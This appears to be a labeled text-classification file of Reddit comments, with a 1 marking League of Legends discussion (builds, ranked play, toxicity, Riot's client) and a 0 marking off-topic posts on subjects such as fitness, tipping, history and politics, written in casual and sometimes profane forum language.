0	From the UK perspective, (it's not something we really have here), it seems to be that instead of being a legitimate exercise regime to get heavier people in the gym/doing  any  exercise, it's become a lazy exercise regime for people who are healthy but not over-fit, who just can't be bothered.  Additionally, a lot of the 'exercises' that crossfit ends up being, have poor form and will end up with people hurting themselves.  The exercises in the gym are structured to get the best result with the safest support for your body, and even though 'Sports Science' sounds flaky (well, it used to, to me before I started actually exercising), it's there for a reason.   Or at least that's how I see it.
1	Let's say, Vi jungle is OP. Her Kit is way too strong.   Her ganks are already strong pre 6, after that the slightest misstep in lane and you get dunked. Also, Vi can 1v1 a solo lane with Spirit of the Lizard Elder and normal jungle farm. And not just 1v1 but dominate, the damage output is insane.
1	Why does everything have to be puppy dogs and roses?  Why is it that anything spoken or written should be positive and if its negative it shouldn't exist or not be the popular opinion.  You are trying to call out specific groups or people again "to cowardly to be jerks in real life", actually I am pretty sure there is still a large amount of douchebags that are so online and offline.  I can be vocal about my opinion, and don't care about other criticizing me, in fact I welcome it, but not because I live my life based on other people valuing me, but it intrigues me.   If you are wearing something outside, dress, shoes, or anything that you like you are "showing" it off, people are judging it because you put it out there to be.   If you only wear things out based on what you like and don't care what others think?  Then the same should be about your physical appearance and then we wouldn't be having this argument.   Everyone is open for judgement, like it or not, and everything is judged from top to bottom.  Men as a whole look for perfection, their DNA tells them to do it, society tells them to do it, women buying INTO it reinforces it.   You think differently then a man, and we think differently from you.  Those "ugly" men out there on forums that get made fun of are made fun of by MEN, a very small amount of women would step out and openly insult him he would be that "nice guy".  There are traits that we require, want, or let slide by who we choose, women are often judged by men on a multiple point score, we often do it subconsciously so we are often the biggest critics.   Does it make sense? Eh   Does it suck? Yep   Does life go on? Yep
0	Or let people do whatever the hell they please. It's not like they are tattooing on  your skin . Something like a reddit based tattoo on someone you don't even know shouldn't even register on your radar. Why? Simply because it's no one's business to judge what someone else puts on their skin. It might mean something to the individual.
1	just play the game. The more you play the more you get familiar with the spells your hero uses and the spells that the enemy heroes use.   As far as the items are concerned at the beginning you cant go too wrong if you stick with the recommended items, but dont buy a jungle item if you dont plan on jungling, ww for example is also a solid toplaner.   Once you soaked up some experience you can start to make your own thoughts about what items to buy.   If the enemy team has alot of heroes which rely on autoattacking or physical damage spells it might be usefull to grab some armor, likewise for mages and magic resist.   If the enemy has alot of crowd control it might be good to buy a item which offers tenacity.   The enemy stacks resistances? No problem just grab a void staff ( if you are ap) or last whisper ( if you are ad)   Your hero has an attack speed steroid? Focus on buying ad or on hit items instead of buying additional attack speed.   You can also watch some streamers if you wanna gain further inside into the game. Streamers like wingsofdeath often explain the reasoning behind their plays pretty good.   Also another important thing which alot of the new players often do neglect. Keep your primary focus in the lane on lasthitting as many minions as possible. Often its just not worth to keep dueling the enemy champions and loose tons of gold for missed lasthits unless you can force the enemy champion out of lane.
1	But why isn't it. Its the tool that everyone who plays league has to use in order to play a game and use the shop. This automatically gives it a high priority because if that is buggy then the game becomes harder to play. (Some people would say the shop bugs would also earn Riot less money, but I believe Riot truly does have the players in their mind rather then solely money.)   Now if it was a couple little bugs they could probably let it slide, however its massive bugs and an old outdated client. I can't even click links in the client without it coming up with a blank notepad doc (rip new match history for me) and I repaired the client just to try and fix that. This needs to be their highest priority. Especially now that the SR VU is in place.
0	this is a very good point. both party's confidence and ability to deal with the social repercussions of the situation play a role in the success of the relationship, or it even happening in the first place, which is pretty much the
1	Stinger. I've found even in a losing lane it's best to rush your Stinger into Nashors, because it's so important to Kayle's kit. With her Q nerf a few months back, she can't really trade as effectively by rushing AP and maxing Q first. That's, in part, why you max E first. This puts even more pressure on getting BOTH attack speed and CDR. It helps you keep your ranged attacks up (which helps with harass as well as wave clear) and proc as much damage as possible by applying her passive. That's also why Runaans is so fucking broken on Kayle atm. It counts towards her base attack damage, applies her passive, AND counts towards the splash damage of her E. It's the most relevant second item on Kayle, unless you're desperate to get her Lucidity boots (again, CDR is everything here. It allows for more Q's, keeps your E up, allows you to heal more, and keeps your ultimate available in every fight or skirmish. You can "blow" your ultimate in a 1v1, then still have it up in 60 seconds for the upcoming team fight or 2v1 gank).   That all said, I'd sincerely recommend getting a second Doran's ring on your first back, if you can. Yes you want your stinger but the Doran's and boots with a ward and health pot buy (835g) is much more reasonable to get, allows you to trade in lane with 1 point in Q and CS/auto enemy while still being safe. Treat it like you would on a basic mage. Yes you want your big item (NLR/CoH) if it's available, but usually it's better to get mana sustain and utility (Doran's plus boots) if that's all you can afford.   BTW most effective runes are Hybrid Pen marks, Health per level seals, AS quints, and 6 CDR blues with 3 AP or MR blues, depending on the match-up. Build path should be Nash, CDR boots (furor upgrade if you want to kite in teamfights), Runaans, then Void Staff/Zhonyas/Deathcap in whatever order you need, based on enemy build. If they're rushing armor or AP, get DC. If MR, get Void, if attack damage or they can 1 - shot you, get Zhonyas.
0	I am not a doctor, but I can get depressed (I do not have depression, but experience moments of being slightly depressed), and feel like video games exacerbate the feeling.  The reason being that when I play video games, I am happy and content for the time being.  After 10 hours flies by of playing Diablo III or what not, I realize "Holy shit! I accomplished nothing today, I am kind of a piece of shit".  I have recently cut back my gaming by 95% - went from playing 30 hours a week to 2 hours a week (I can't maths) - and I feel like my mood and attitude has improved tenfold.  Now I am not saying "Don't play video games!", but if you are feeling in the dumps, do something productive, even if it is only for a short period of time such as 30 minutes.  This could be reading a book you enjoy or that is educational, doing some light excercise, maintaining a social relationship you value, cleaning your house/room/apartment/bathroom, doing something nice for someone, build something, etc.  Please note that "productivity" does not include working for a paycheck.  That is something you do to feed yourself and not something you do for yourself for betterment.  If you spend a small amount of time doing something productive each day, you will feel much better about yourself when you reflect back on the day, thus curbing some of the feelings of depression.
1	From what I've seen, Fiora requires damn near perfect play to do well.  She's an all or nothing champ (she wins or she feeds).  Without CC or Tankiness she cannot lose her lane and remain useful, however a fed Fiora does a godly amount of damage.   Fiora's skill cap is so high that even the pros don't want anything to do with her.  One mistake can essentially break your game.
0	I agree.   But taking that into hindsight, let's look at the major things that came from all of us getting along and playing nice in the kiddy-pool of the world, The Space Station and the fall of the Berlin Wall just as examples.   Were there some recent rough jaunts? Of course! The war with Georgia that everyone seems to have forgotten in 2008, not to mention the most recent annexing of Crimea. How about China knowingly selling us flawed components for use in development of military arms in 2009-2010 thanks to a government backed agreement with Lockheed-Martain?   We as a nation are no better. Look at the train wreck that is in the Trans-Pacific Trade Deal that has been leaked, and you can see where we are literally screwing our neighbors and securing areas of commerce that need no steep regulation (like computer programming and software development) that will in the end lead to us bleeding out more resources over a short-term bandage for something that needs a tourniquet.   However, all that aside there are bases that we don't need footholds in where we burn millions in occupying for only days out of the year, and billions worth in aid that we throw away to repair the "black eye" we have on levels of respect with other nations. There are issues that have no concern to us that we meddle in, such as the infighting between Sunni and Shiite people in the Middle East (Bahrain), the exploitation of the Han people in Eastern China, or even the Human Rights issues of North Korea.   We have our hard working poor and destitute to worry about as well, and instead of aiding them we push them to the side and say: "Sorry Vietnam/Desert Storm/Iraq War Veteran, we know you're hungry, sick and have been fucked religiously by the VA-Offices, but we'll get back to you after we fix this growing publicity issue that needs attending to right now."   Or another great one that no one takes interest in: "We're sorry residential Miner, we sold the rights for you to work when the mine got sold out from under your nose by the owning company. We understand 3-generations of your family have sacrificed themselves to the GDP of America, and you figuratively have nothing else here to live off of since it's a Right To Work state and the land is too poisoned to grow food off of... So good luck relocating your family off of the few hundred dollars you made every week here to survive. Your severance check will come in two months when the deal is finalized."   I'm all for a good stabilized foreign policy, but my only point is there's a few things in the homeland we need to desperately look at with a magnifying glass if we want to be as great as we were. "The American Dream" came and went for the middle class citizen 45-years ago, and politicians have been baiting us that "it's coming around the corner again if you get me in office". It's only fair that the politicians running the shit-show help us first and worry about dipping hands into the volcanic eruption in Chile second, that's all I'm saying.
1	I've been trying to get good with Zed a lot recently because I know he's extremely strong when you have the mechanics and skill to play him, but I think I won't ever play him again because     I know I will never be on Faker's level.     I am not worthy of trying to reach his level
0	I had a similar story with a neighbour. There were two cats in cages in front of my building's door. I let them there but checked after 1 hour if they were still there. It was late and getting really cold (freezing) so I took them inside of my appartement and noticed a note on one of the cages "to Mr. X". I then rang at the door of Mr. X, no answer, I leave a note on his door to say that his cats are at my place. I search him on the web and find his facebook profile so I send him a message. The night passes and the cats sleep at my place (they were pretty scared and it took more than one hour for them to leave the cage.)  I had no cat at the time so I gave them tuna and hoped that they would stay clean as long as possible. The next day he knocks at my door angrily "WHY DO YOU HAVE MY CATS!". Apparently he splitted up with his girlfriend and she left the cats in front of his door without telling him. And he was mad at me for taking care of them...
0	This reminds me of a when I went to a toilet in Malaysia, every single stall was occupied so I waited in line casually. A man walked out of the stall, cool, nobody went in, weird.. counted to ten (waiting for someone to go) then asked the guy next to me if he wanted to go in, he was explaining something with huge gestures and a lot of hand movement, I understood nothing and just walked in taking his answer as a no. I unzipped took out my Arabian cobra spurt out the venom.  ahhhhh holy mother of Khadeeja!  whilst peeing, I hear a loud "ahem", I hear it again louder and clearer and more emphasized "AHEM". It was the stall next to mine, naturally I looked left, I vaguely saw something quivering (like a wasp trapped in a small jar) with my peripherals, I looked furthermore to the left and a little under and suddenly  HOLY MOTHER OF FAYROUZ  it's a small flaccid penis! No wonder the toilet was so clean!
1	Here's why:   If I ping someone to get out of a certain spot  one time,  they will not listen, they will die, and that's that.   If I ping someone like 4 times. They have a choice to make. I have now made a  clear  statement that they are going to die if they stay/go to a certain spot. If they continue to go to that spot, and then die, everyone will know I was right and that person was wrong. They will in essence be shown to have made a clear, predictable mistake in front of their entire team.   Some  people are able to realize this and take a second thought before going to that dangerous place where they will likely die, because they know if they go and are wrong, they will be humiliated in a very light sense, in front of their team.
1	You might as well stop doing this.   Okay.jpg :(   The thing is, the lesson learned section is actually more of a 'my current thoughts on the finished game'. I'll keep you guys updated and make seperate columns for
1	I looked up to the character you have been playing, and if i can give you some advice, 1st don't play Vayne, she is hard to master whatever people would say, you have only 175 wins in normal, so I assume around 400 games with your ranked, wich is really too low, you shoulda have pratice and learn 2 or 3 roles in normal game, i'm actually at 1500 normal game with 20ranked, and i can say that i'm a decent Top/Jungler/Mid, you should try to do more normal and improve yourself on your favorites roles.   Than, i saw you play a lot of CC Champs, such as Alistar and Nautilus, they are definetely good in mid/high elo, but you are playing with 500elo Teammates, so your CC won't be usefull as they are going to be wasted   If i was in the same state as you, i'ld play either Midlane (Annie/Morgana/Kassadin) to help a lot your other lane while still being fed, or jungler, just beacuse you can gank everywhere, i'm assuming wards is not a common word in the 500elo games...   From now, you know the word "WARD" and you'll use them, at least for your own protection (I guess you can't use them agressively with the ack of team organisation).
1	and every other champion that is not UP in the current meta, especially Bronze games are easy to carry for experienced players. I read quite a lot of things like "how to get out of elo hell" and tbh i learned something out of it. The more you play the better you get, learn basic stuff like last hitting, how to manage lanes pushing towards you or lanes you push, when and why you do it. IMO to get out of Bronze get a DuoQ partner you think is good and play with him duo bot. In low elo games its all about average skill and haveing as less leavers or flamers as possible. So in conclusion you and your DuoQ partner are 2 out of 5 that means the possibility of leavers are 37,5% chance in your team and a 62,5% chance in the enemy team.
1	While it can be argued that gaming can cause addictions that are similar to gambling and drug abuse, there is a very large grey area on the subject matter of how a government is supposed to respond to these types of problems.   Sure the drinking age is 21, but there still are alcoholics that ruin lives one way or another. Sure the smoking age is 18, but it still destroys your lungs and your wallet regardless of age. There are countless examples and counterexamples for either side and it is up to the people to support the laws or change them (I am an American so I am used to the democratic process even though it is heavily corrupted).   In the end, it is up to the people to make decisions on these types of activities, whether it be gaming or drugs and alcohol. I do believe that the Korean government is overstepping their bounds when it comes to restricting the amount of time that a teenager can play. IMO, that is the parent/guardian's job, not the government's job, but it seems that it has come to the attention of the Korean government that despite the parents' effort, gaming is becoming an addiction that is gripping the youth and effectively lowering the country's future net worth when it comes time for them to grow up and "contribute to society."   I was, and possibly still am, addicted to gaming. It is a drug in the sense of the control it has over your life. You  can  be addicted to it, and if you are, it  has  the potential to ruin your life. I almost failed out of school because of it. Gaming addiction is no joke for those who are trapped and having support from your loved ones, just like any other addiction, is the best way out of it. In the end, the individual has to want to break the addiction. If I had impositions on how much I could play, I probably wouldn't have been so deep into it, so I see the thinking behind the concept of the potential law. It doesn't make it right, but I understand.
1	Cait has pretty much a free lane win against all adcs, the only adc she has even a slight issue dealing with is jinx, and varus who hasn't even seen any play in over 2 years and cait can just shove jinx under tower the entire lane phase. She's fine where she is, she's probably the safest adc in the game that also has a strong late game.   She also has great lane synergy with sona, janna, nami, blitzcrank, annie and morgana. You just can't go wrong with hee
0	I love the sound. I used to sing at a police memorial and when they would play several things on bagpipes, and as soon as they started playing you couldn't help but become present in the experience. Something about that instrument strikes me deep down. They're mournful in a sense, but at the same time not inherently morose. It's an odd but amazing combination.
0	My GPA is good, too (but I'm writing this instead of studying for an impending exam so maybe not for long), my best friend from high school has decided to become a pervert (so we've fallen out of contact), my other friends from high school are in a university in another city, the only person I made a meaningful connection with in first year has a crippling League of Legends addiction that prevents me from ever talking to/hanging out with him, and I haven't really gelled with anyone else. I blame being a non-drinker in a de facto relationship who isn't living on a college compounded with a complete lack of interest in any of the clubs/societies on campus as well as my personality and niche interests being incompatible with my peers, but it's actually social anxiety reinforced by past failures preventing me from bothering with meaningful friendships.
0	As a waitress, I HATE teenagers. 15 to 17 year olds that come as a group with no parents. So annoying and takes forever to order.  Then leaves barely any tip. I worked at my in laws Mexico resturaunt and a Hitachi spanish class came in. I was their lucky waitress. Huge pain in my ads especially hearing their terrible try and Spanish.  Its pollo not polo!! At the register this one girl in particular had a $9 and some change tab. Gave me a $10. As I'm giving change back the teacher reminds them to tip. She giggles and says "oh this is all I have" and gives me this change back. I judt stood there like really?? That's when the teacher chimed in and chewed her ass out. Judt hearing the ass chewing was good enough for me. But then after all the little pricks were outside the teacher hands me $40 for my troubles.
1	EYE CATCHER   Hey reddit. I'm LagsAlot.  I'm a high diamond level midlane main on EUW.   I  upload things made by myself like  Montages ,  Commentaries ,  little Guides  and some plays by myself. Example : **[Reverse Twisted Fate Outplay](   Come and visit my stuff if you are interested in the things I am doing. I try to upload as many videos per week and I don't have a real schedule but I try to upload atleast 3 videos a week.   Click [ here ]( to see my  1st Midlane Montage  including Nidalee, Yasou and Zed plays and [ here ]( to see my  Nidalee only Montage . [ Here ]( you can see my  Youtube channel  at all.   I wish you a wonderful rest of your life.   Have a nice day.
1	Investing in a new server cost a LOT OF money. Shareholders are the one deciding the high investment and they do not care about operational decision-making like nerfing irelia or creating a new caracter. But riot can make some research,charts, etc ... to harvest the gold that could generate a East coast server.
1	with faerie charm and utility masteries it's not hard to manage your mana as long as you're not spamming heal at every opportunity. she still has pretty good sustain as long as your carry isn't dumb and keeps on engaging when the other team can trade better. i also pretty much only use infuse and auto attacks to harass to conserve mana. you can also run bot with an ap that has a good spammable nuke like karth/cass and just constantly feed them mana.
1	Don't just go bot just because you jungler isn't ganking. Go bot so you can force dragon or bot tower. If bot tower and drag are both down, going bot is pretty much pointless (unless you have gotten mid down as well). Once you get your mid tower you can coordinate with your jungler to ward their buffs and counter them if neither drag or bot tower are up.   You have an advantage, use it to force more than kills.
0	Shouldn't the bellhop at the nicer hotel be paid more than too? I mean, they probably are by virtue of the fact the clientele on average have more money (so probably more likely to tip better). But.... then the same applies to the patrons of an expensive restaurant too. I'd also say a waiter working at a restaurant where the average cheque is $100 probably isn't performing ten times as well as a place where you're paying $10.
1	If they gave you a badge once you crossed x ELO it would be the same. You would know you are "diamond" once your top Elo goes over the required for Diamond. No promo games, no BS, just hit x Elo get a tier badge.   The main problem with the league system is that it has no impact on matchmaking - it won't prefer to match you with people in your division, it won't prefer to match you with other people playing their promo games, it won't even use your rank in any way since it's not an accurate representation of your current MMR because you can't fall in to lower tier.   What's the actual benefit of divisions and league system when it changes nothing for matchmaking ?
1	Nooo, this is the worst thing about the internet sometimes.   You should never cry because of stupid, random assholes, whom you don't even know. I know that you know this already, but damn I just gotta repeat it. Put people who are being negative, rude, obnoxious or something similar on ignore. Ignore the shit out of them. Don't even bother with replying. Just realize that these clowns hold no power over you, their opinions are useless and without any value whatsoever. Ignore, ignore, ignore!!! Don't fret if you have a bad game, whatever. But ignore those asswipes right away. Do not take their words to heart. FUCK THOSE GUYS!
1	You see, I love playing support. I have a retarded high win percentage in both normals and ranked by carrying the bottom lane with Sona harass. Still, a lot of games are lost because there are pants-on-head retarded people who can't play a fucking solo lane. Obviously, a solo lane will have a high impact on the game. If you can't CS and/or feed your lane you shouldn't be given a solo lane. On the other hand, if you declare what role or lane you play at the beginning of champ select then this game isn't for you. You pick when it's your turn and you will have to pick something that suits your team and not what you want to play.
1	Yorick is underplayed, and ive not really seen much of him However, i have played renekton, and even as a bad player back then, i got atleast 1:1 KDs. I can do much better now ^^
0	She was implying that her decision would be to show them....until she got called on it. It was basically "Hey Look I am a girl on reddit with nipple piercings and like to show them off." When reddit called her on it, she backed out.
1	Honestly everyone,  what  do you want? It was an unforeseen incident that happened. That's it. There is no way to to make the process go any faster, so we all just have to buckle down and deal with it! I understand that we have paid for it. Some of us have paid a LOT for it. But it's not like Riot is kicking back and laughing maniacally while they light cigars with $20 bills, leaving this problem for us to just live with, right? They are fixing it! Don't you all remember when we were waiting up to 3 hours to join the game? And that was just a couple of days ago!  Obviously  the problem is on its way to getting fixed. Riot, I know you're doing all you can short of shutting off the game to fix it. You guys are awesome!
0	Ok reddit so here is a History lesson for you. Henry the 8th did not create   a new church so he could remarry. Martin Luther started the reformation of the Church based on a conflict of ideologies with Catholicism. A movement that was gaining popularity across europe particularly in Germany. The reformation moved towards a more literal interpretation of the bible and less away from the man made doctrines and subjectiveness of catholicism. Sure this made it easier for Henry to get his divorce but is a part of a larger more complex historical discourse than this meme portrays.
1	Yeah because the reason this kid didnt just make a new acc is because he has skins/champs etc that were bought with RP.   You are an idiot if you think that, because its a free game, that riot are not money hungry.   Let me ask you this then, If someone is permabanned, why are they not IP banned like EVERY other game on the face of the earth. Why? So you can create a new account, do the same shit, and spend more money.
0	ITT: People are like barbarians using PCs. Go through 2-3 in college??? I have an HP Pavilion tx2000 tablet laptop (I know I thought they would be useful) and besides the battery wearing down like every other laptop, I have zero problems with it. NOW I give credit to Apple, those Macbooks are built better than PC in Mid 2000s but when I compared the Asus A55 Series to a Macbook, the durability was about the same and I could customize the PC. I work in IT so I enjoy changing hardware to my standards, but that doesn't mean I wouldn't get a Macbook: I just haven't had problems with PCs since I am not 7 years old and destroy it with viruses/IE/some porn.
1	HSGG doesn't want to release any information on it yet (he's taking point on handling it from CLG's side, btw), until he has hard evidence about it. Apparently this deals with talking to Riot for some IP logs, which involves talking to Marcou, who is on his way back from Providence (he said he'll be back in Riot offices Tuesday, iirc).   Since this will obviously only get wrapped up (or continued) with Hotshot's handling of it, we just need to wait until tomorrow.   I don't know what these people who are saying "we kind of forgot about it" or that "no one cares" are talking about since they really don't have substantiation, there's a pretty reasonable due process going on. I think this is how it should be dealt with anyways, to cool the pitchforks and look at things more objectively.
1	I usually like to be subtle, but it's 11 at night.  You were banned because a Riot rep tasked to determining whether or not to ban someone thought your actions were ban-worthy.  You may not think that your actions fell under that umbrella, but you are  wrong.   You're expecting to get preferential treatment from Riot just because you used to be a big deal (apparently), and you've shared technical details with them in the past.  You've got to face the facts: you're not immune to the tribunal just because of who you are, and neither will you receive preferential treatment.   It doesn't matter whether you feel cheated or not.  A jury of your peers determined that you broke the Summoner's Code on  multiple  occasions and thus, you were banned.  The right thing to do in this instance is to provide Riot with the exploit, and give them the opportunity to push out a fix before going public with  any  details.  Anything else, and I wouldn't be surprised if Riot just out-and-out permabans you.   The only section of the community that this information would help are the trolls and asshats who have also been banned for their behavior in game.  Going public will have no positive effect on the game itself, and it will only serve to stroke your ego, and make a lot of bad people very happy.   If you want Riot to acknowledge your existence, do something nice.  Start a tutorial series, or write some League-themed comedy.  If you're an experienced gamer, perhaps shoutcasting would be a decent avenue for you to take.  Make a  positive  difference in this community rather than a negative one.
0	Well, many people don't give a damn about gays. This means gay people are free to do what they want, but nobody wants them screaming "It's good to be gay, join the gay community". Unfortunately, some of Russian gay activists do that, as if this was a choice, not genetics.
1	EDIT  : Check the comment by /u/nbxx below   I can't really follow what you are saying. I'll try my best though :   EG and Alliance are in different regions, there is no problem with them having conflicting interests. I do not know if Amazon owns them either but that wouldn't change anything.   Sponsoring a team is allowed no matter how many other teams you are already sponsoring - this is the reason Curse sold their teams so that they could sponsor multiple ones instead.   The Curse team group merged with the Liquid on to make the new main "curse" team and the Curse Academy team will have to find a new owner (if they haven't already, I am not up to date with this) since the curse organization pulled from owning teams completely.   China is, indeed, a bit weird. Riot can't really control them.
1	Welcome to the real world, where articles don't and shouldn't have
1	The fun thing which way you did not carry ?   Your team got inhib and 1 inhi tower. But other point is throws, hard throws like really when you need to group and team you wonder solo, too many dying to them on pointless basis (cass vs vayne and cass got full ult on you :D).   The point is: your got kills and carried till mid game but later on your team and you thrown the game.   What can be done: learn to get objectives (man really baron at ~26 and not real objectives by team got ).
0	LaPiere (1934)   Can you
1	If the rest of your team is doing poorly, I'm not going to sugar coat it, some of those games you cant win unless your adc is ahead. Aside from that, playing support is about positioning and being able to make plays. There are blitz games that I've won where my team was doing poorly, my adc was doing well, and I just ran around making hooks and climbed ourselves back into the game.   You need to understand when you're ahead as a support and position according, whether it be gold, jungler presence or your minion wave larger than theirs. Noticed those small factors can turn an engage in your favor.   Something I liked to do with Blitz is look for a low minion that my ADC is about to last hit and see if the enemy ADC is standing behind it then toss out a hook right when he kills it. Keep in mind tho, thresh is not just about being able to land hooks in lane, sometimes a good flash flay while using a lantern to pull in your jungler is all you need. Then using the hook after they flash.   Hope this helps
1	the problem with that is, even if you win your lane, you can still lose the game. Top lane probably has the least impact on the overall game, especially early game, where low-elo games decide. First, if bot lose the lane, you lose dps AND enemy gain dps, so unless you are able to dps for your AD carry, you cannot carry. Second, if mid loses the lane, the enemy gain burst potential when your loses it. Therefore, you have to dps for mid, too. On top of every single things you have to do like getting dragon (which is bot btw), living jungle ganks, gaining damage for your team, you have to tank all the damage the enemy team has gain. If you somehow win a game like this, you are basically superman, who is invincible to all damage and do tremendous damage. Even being in god mode cannot win you the game because if enemy team has any hard cc like stuns, snares (for melee), or exhaust, your damage is gone.
1	As someone who plays regularly with 4-5 people, often having a "random", don't be a dick, then blame the premade for ganging up on you. So many times when we play, the first thing we ask is "Where do you want to play?". 6-7/10 times there is no answer. Then, they lock in something we already have. Then there's the people that answer "Im taking X or i feed". This happens so many times. Just because we're 4, it doesn't mean we have a magical ability to know what people want to play.   Yesterday, queued, got put with a guy who was an exception to these rules. Brilliant we thought. We invited him on to mumble with us. As soon as the game started going a little bit pear shaped, he started raging, and raging. Because he left Mumble early on, and didn't tell us, we were trying to communicate with obviously nothing going on.
1	How is asking "why" useful in any sense? 99 percent of the time the individual knows they made a mistake. Therefore, when a team mate says "why", the team mate then gets perceived as a total douche because there is an implication that he is defining the individual's mistake as completely retarded. Also, chances are that he will not have an opportunity to make that same mistake again AND you will  probably never be in a game with said individual.
0	Don't blame reddit... blame yourself for BEING A MONSTER!
0	If you want to mod a laptop you're going to have a bad time.   Ram and HDD are usually user replaceable in most windows based laptops. However if you want to upgrade your GPU/VPU and sound chip in your lap top forget it.
0	In all honesty, i find it intresting what people care about these days. So to make it short here's a
0	I just don't know...I was born and raised and still living in "the ghetto", and really most of it is not as bad as everyone on here makes it seem. I know there's a lot of i guess privileged people on here, so I guess it seems unfriendly compared to where you come from, but that's just cause the cities don't care about maintaining poor areas. And honestly, well-to-do neighborhoods scare me more. They're like ghost towns. :(
1	To put it really short and sweet!   I play LoL because of the same reasons I keep on coming back to certain kinds of sports. The rules may be the same but one game is never the same as the next one and that is why it's such a great game.   You can start it at any given time during the day and be guaranteed to get atleast ~20 minutes of good entertainment.(I don't rage even in the face of defeat, so I enjoy it either way).   I'm a HUGE retro nerd and avid gamer of oldschool stuff and this made me go "WARBLGHLGHLHGLL" and start to drool excessively. PLEASE for the love of god and all that is holy, I don't care about free stuff, but let me play this. I will find you and be your slave should you deem me to be worthy.
0	I mostly support this and the comment above, but to add: law and order politicians, ie -those who increase the time behind bars for offenders or lessen funding for public defense programs decrease confidence in our legal system and thus make for no trust in the police force. To a young man, perhaps with barely a high school education gets wrongly arrested but is forced to sign a plea deal to make sure he's not charged with a felony, I can't blame him/her for announcing "fuck the police", and unfortunately the reverberates up and down society and gets blamed on the arresting officer. Another note worth a mention, especially here in the south there is little love for the police in the black community, because even as of twenty years ago there were still egregious violations of the law by police that most in power turned a blind eye to (well, still happening in NYC).
0	Um. She also did some good while being under intense scrutiny. My main issue with the whole thing is that Tony 'budgie smugglers' Abbott is a conservative dinosaur who hasn't even made a party platform. They just stand there and parrot disagreement without coming up with any viable alternatives.
1	Mid Kha - Hydra/Black Cleaver/Last Whisper/GA then usually merc treads if against AP, as last item choose between offensive (BT, never go TF or IE) or defensive (Randuins or Banshees). Rush Tiamat, Brut and LW and you can kill anyone.   Jung Kha - It depends, if you're the one getting the kills, go offensive so Elder Lizard/Black Cleaver/LW/GA and maybe add an Hydra too or Randuins/Banshees as last item. If you're not the one getting the kills/fed, go more tanky so go Elder Lizard/LW/Randuins/Banshees/GA and maybe add a Warmog/Thornmail as last item. I dont like Hexdrinker that much but it's good against double AP comps. As for boots, if you're ganking everywhere, get early mobis, if not just go tabis/mercs. CDR boots are not that great.   As for evolutions, go Q>E>R as midlane. As for jungle go R>E>Q. The new R evolution is really really strong, it has such low cd and immense utility, can win fights alone.   Btw, never get BotrK, IE, TF or Feral Flare on Khazix. They're either too expensive or have stats that dont go well with Kha (atk spd is not that great, neither is crit). Your damage will come from the E>Q>W combo and the passive AAs. Besides that, Kha has insane AD scalings, building anything but AD/Armor pen is wasting his potential.
1	I actually completely disagree.  I think team and individual photos' should reflect the personality of the team or player.  Take imaqtpie for example, he's know as a happy-go-lucky kind of guy and his picture reflects that. Where as someone such as Saint Vicious is know for being sort of a tough guy, thus his picture makes sense.  Now, do some of the photos look a bit forced, yes, but over all I think they fairly accurately display the personality of the person or team.
1	exactly. And, as a jungler, it's really easy to fall a few levels behind due to ganking and lane pressuring... So you don't scale properly on that regard either.
1	Maybe our cards dealt differ.   My experience people pick lanes just to tell you how to play yours. You could be 5-0-3 as an ADC 10 minutes in, but if your CS is only 50, you're bad. Or if we don't get first blood it's AFK time. Or if they messed up an invade/smite steal they AFK. Or the guy that just beats down a teammate for being "Bad," literally just going off. And when they get muted, they find a new ear to vent to about them, whether it is the other team or us. Effectively they just started up LoL to argue. Or the racists. Or the Jungle that doesn't gank, he just comes to each lane and steals farm. Then proceeds to dive enemies hugging their turret after stealing a few waves. Ends up feeding a lane. People don't ward or call mias. And forget constructive criticism, not even the direct kind. I could ask "Lets get some more wards out on the map," and get told to "Fck u men, wrd suport not me job. N0b." Or I have even rewarded Baron+Dragon as an ADC/Top/Jungle/ even warded Tribushes and River when I didn't see my team with them just to get told "Asshole, warding it my job. Stop!"   None of this is an exaggeration, all of that has and does happen. Drives me insane. It severely cripples my morale. But I guess, pun intended, "Diamonds are made under pressure." If capitalizing on every mistake I possibly can, and ramifying any mistake my team makes is what I need to do to climb the ladder, so be it. Those skills are probably vital to top-tier success anyway.   Overall, there are so many minor things in Solo Q, that it is very hard to attempt to carry your team to victory. I feel like the planets have to align with God's butthole sometimes.
0	Of course, this is also when "choose the most correct answer" comes into play, and somehow A was more correct than B, thus, choosing either C or D is wrong.   Yes, it seems blatantly obvious what the teacher intended. It doesn't solve the problem that we're sweating bullets during exams and really rather not have to figure out whether you're fucking with us or just slipped and made a mistake.
0	That's okay man. Imagine yourself to be a hostel. Your feelings are your guests. Sometimes you get some nice ones, sometimes you get some nasty ones. Some guests stay a long time, some just a short while. Your job as a hostel is to accomodate all of them, without judgement. Eventually all of them will leave. And you will be fine.
1	1)  Being able to kick a player who is toxic in the lobby is probably the most effective way to deal with a toxic player in the lobby (Redundant I know). This is purely based on the fact in how you are meeting other players since you have very little control over who you decide to interact with since you are forced into playing with them. (Do not let this be a normal queue feature otherwise pre-mades can easily abuse this)   2)  As a solution to normal ranked queue, I don't see this as a good solution. You would run into the issues that WoW has were many people want to queue for specific roles which would cause long queue times for some roles and shorter ones for others. People would abuse this by queuing for support or a short time roles just to play another role. So it would not solve anything.   A better solution than this would to make it easier for players to find others to play with in a ranked 5s team. To solve many of these issues, I think putting more focus into people playing ranked 5s rather than single queuing would be the best way to cause fewer problems. The problem that arises in solo queue is that you have conflicting personalities and although the same issues arise in ranked 5s, people have much more control over who they play with.   Giving more rewards in ranked 5s as well as making it easier to find people to play with would make it more popular and cause fewer problems with randoms but allow people to work out problems with their team and go to a new one if necessary much like how arena works in WoW. For rewards, you would need to get people to play as well as get them to continue playing ranked 5s. To accomplish this, introducing a currency that can only be obtained from ranked 5s that would be able to buy certain skins would be the best solution. I'll call the currency Legend Points or LP. There would be a cap per week on LP and the higher your rating the larger the cap would be, much like how arena points work in WoW. This would keep people playing as well as introducing skins at the end of the season for certain ratings in ranked 5s.   Another issues restricting people from playing 5s is the social aspect that games like WoW have where you can easily find people to play but LoL has a much harder time meeting people who you may not have played with before which would fit into your team. Since people taking the initiative to play arena or ranked 5s are much less likely to troll or be negative and can be easily replaced if you feel they are not performing or they are too negative to fit in with your team. Increasing the popularity in ranked 5s would go a long way in improving how much of the player base enjoys the game and hopefully would encourage people to try their best in ranked games in order to find people who would want them on a team.   3)  Making a Prisoner’s Island would not solve many issues. It would not help in the short team such as in champion select and it would not help in the long term since you are putting that person in a negative environment and not allowing them to improve but rather encouraging them to continue their negative attitude. Another problem that arises that even if a player is positive in this terrible environment, getting out of it would be a rather difficult task.
